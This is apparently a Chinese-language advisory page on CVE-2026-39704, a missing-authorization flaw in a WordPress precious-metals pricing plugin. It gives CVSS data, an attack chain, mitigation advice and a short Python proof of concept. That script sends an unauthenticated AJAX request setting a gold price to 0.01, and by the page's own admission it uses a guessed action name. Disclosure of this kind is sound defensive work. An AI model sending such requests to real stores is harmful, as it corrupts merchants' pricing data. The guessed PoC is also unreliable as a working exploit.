CVE-2026-39704 CVSS 5.3 中危

CVE-2026-39704: Precious Metals Pro插件越权访问漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39704

漏洞类型

越权访问

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Precious Metals Automated Product Pricing – Pro

漏洞概述

Precious Metals Automated Product Pricing – Pro插件存在缺失授权漏洞。由于错误配置的访问控制安全级别，未经身份验证的远程攻击者可利用此漏洞执行未授权操作。该问题影响从n/a到4.0.5的所有版本，可能导致系统完整性受损。

技术细节

该漏洞源于WordPress插件“Precious Metals Automated Product Pricing – Pro”在处理特定请求时未正确实施权限检查。攻击者可以通过构造特制的HTTP请求（通常是发送到wp-admin/admin-ajax.php的AJAX请求），直接调用敏感的后台功能，而无需登录管理员账户。由于CVSS向量显示PR:N（无需权限），这表明插件中存在未公开的动作（action）或钩子（hook）直接暴露给了前端。攻击者利用此漏洞可以更改产品价格设置或其他影响数据完整性的操作，虽然不影响机密性和可用性，但破坏了数据的完整性。

攻击链分析

STEP 1

侦察

识别目标WordPress站点是否安装了受影响版本的Precious Metals Automated Product Pricing – Pro插件。

STEP 2

利用

向`/wp-admin/admin-ajax.php`发送特制的POST请求，包含插件特定的action参数和恶意数据，无需任何身份验证。

STEP 3

影响

服务器接受请求并执行操作，导致产品定价数据或相关配置被非授权修改，破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Precious Metals Automated Product Pricing - Pro < 4.0.5 Missing Authorization PoC
# Description: This script demonstrates how to exploit the missing authorization vulnerability.

target_url = "http://example.com/wp-admin/admin-ajax.php"

# Vulnerable action name (Hypothetical based on plugin functionality)
data = {
    "action": "pmapp_update_pricing",  # Replace with actual action name if known
    "price_type": "gold",
    "price_value": "0.01"
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if settings changed.")
        print("[+] Response:", response.text)
    else:
        print("[-] Failed to send request.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Precious Metals Automated Product Pricing – Pro <= 4.0.5

防御指南

临时缓解措施

建议立即检查插件版本，若受影响则升级至最新修复版本。在升级前，可临时禁用该插件以阻断攻击面，或通过服务器规则限制对`admin-ajax.php`的匿名POST请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表